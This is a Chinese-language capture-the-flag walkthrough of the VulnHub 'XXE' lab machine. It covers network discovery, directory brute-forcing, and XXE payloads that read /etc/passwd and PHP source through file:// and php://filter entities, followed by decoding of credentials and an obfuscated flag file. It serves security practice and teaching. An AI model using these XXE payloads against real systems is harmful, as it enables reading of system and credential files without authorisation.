下載連結:https://download.vulnhub.com/xxe/XXE.zip   0x01 確定目標IP 目標網路模式預設為net模式，無需修改 使用arp-scan或者netdiscover確定目標ip arp-scan -l 或者 netdiscover -i eth1 目標ip為 192.168.88.128 探測埠，發現目標機器只開啟了80埠 訪問web服務發現為apache預設頁面，猜測存在隱藏目錄 0x02 目錄爆破 dirb http://192.168.88.128 只掃到一個robots.txt檔案 訪問 http://192.168.88.128/robots.txt 一個/xxe/目錄，有個後臺頁面 先訪問xxe目錄 http://192.168.88.128/xxe/ 輸入使用者名稱密碼進行抓包分析 可以看到使用者名稱密碼是通過xml傳遞給後端的 0x02 xxe漏洞利用 burp抓包，修改post體，嘗試讀取/etc/passwd <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY admin SYSTEM "file:///etc/passwd"> ]> <root><name>&admin;</name><password>1</password></root> 接下來我們可以使用php://filter/read=convert.base64-encode/resource=admin.php讀取admin.php的原始碼。 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php"> ]> <root><name>admin</name><password>admin</password></root> 返回包進行了加密，無法直接找到flag base64解碼：找到使用者名稱密碼 administhebest/e6e061838856bf47e1de730719fb2609 對password密文進一步解碼，獲得使用者名稱密碼：administhebest/admin@123 使用賬戶名密碼登入admin.php http://192.168.88.128/xxe/admin.php 點選登入出現的一個紅色的flag字樣 當點選flag會跳轉web根目錄http://192.168.88.128/flagmeout.php 一個空白頁 檢視也頁面原始碼獲得flag提示 <!-- the flag in (JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5) --> 先進行base32 解碼，再進行base64解碼   檢視/etc/.flag.php原始碼 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/.flag.php"> ]> <root><name>&admin;</name><password>admin</password></root> base64解碼：看不懂是啥東西，將返回內容複製儲存為php 開啟web服務 php -S 0.0.0.0:8090 -t /root 返回的還是剛才那串字元 前後分別加上<?php ?> 重新儲存為php <?php JF9bXSsrOyRfW109JF8uXzskX19fX189JF9bKCsrJF9fW10pXVsoKyskX19bXSkrKCsrJF9fW10pKygrKyRfX1tdKV07JF89JF9bJF9bK19dXTskX19fPSRfXz0kX1srKyRfX1tdXTskX19fXz0kXz0kX1srX107JF8rKzskXysrOyRfKys7JF89JF9fX18uKyskX19fLiRfX18uKyskXy4kX18uKyskX19fOyRfXz0kXzskXz0kX19fX187JF8rKzskXysrOyRfKys7JF8rKzskXysrOyRfKys7JF8rKzskXysrOyRfKys7JF8rKzskX19fPStfOyRfX18uPSRfXzskX19fPSsrJF9eJF9fX1srX107JMOAPStfOyTDgT0kw4I9JMODPSTDhD0kw4Y9JMOIPSTDiT0kw4o9JMOLPSsrJMOBW107JMOCKys7JMODKys7JMODKys7JMOEKys7JMOEKys7JMOEKys7JMOGKys7JMOGKys7JMOGKys7JMOGKys7JMOIKys7JMOIKys7JMOIKys7JMOIKys7JMOIKys7JMOJKys7JMOJKys7JMOJKys7JMOJKys7JMOJKys7JMOJKys7JMOKKys7JMOKKys7JMOKKys7JMOKKys7JMOKKys7JMOKKys7JMOKKys7JMOLKys7JMOLKys7JMOLKys7JMOLKys7JMOLKys7JMOLKys7JMOLKys7JF9fKCckXz0iJy4kX19fLiTDgS4kw4IuJMODLiRfX18uJMOBLiTDgC4kw4EuJF9fXy4kw4EuJMOALiTDiC4kX19fLiTDgS4kw4AuJMODLiRfX18uJMOBLiTDgi4kw4MuJF9fXy4kw4EuJMOCLiTDgC4kX19fLiTDgS4kw4kuJMODLiRfX18uJMOBLiTDiS4kw4AuJF9fXy4kw4EuJMOJLiTDgC4kX19fLiTDgS4kw4QuJMOGLiRfX18uJMOBLiTDgy4kw4kuJF9fXy4kw4EuJMOGLiTDgS4kX19fLiTDgS4kw4guJMODLiRfX18uJMOBLiTDgy4kw4kuJF9fXy4kw4EuJMOILiTDgy4kX19fLiTDgS4kw4YuJMOJLiRfX18uJMOBLiTDgy4kw4kuJF9fXy4kw4EuJMOELiTDhi4kX19fLiTDgS4kw4QuJMOBLiRfX18uJMOBLiTDiC4kw4MuJF9fXy4kw4EuJMOJLiTDgS4kX19fLiTDgS4kw4kuJMOGLiciJyk7JF9fKCRfKTsK ?&g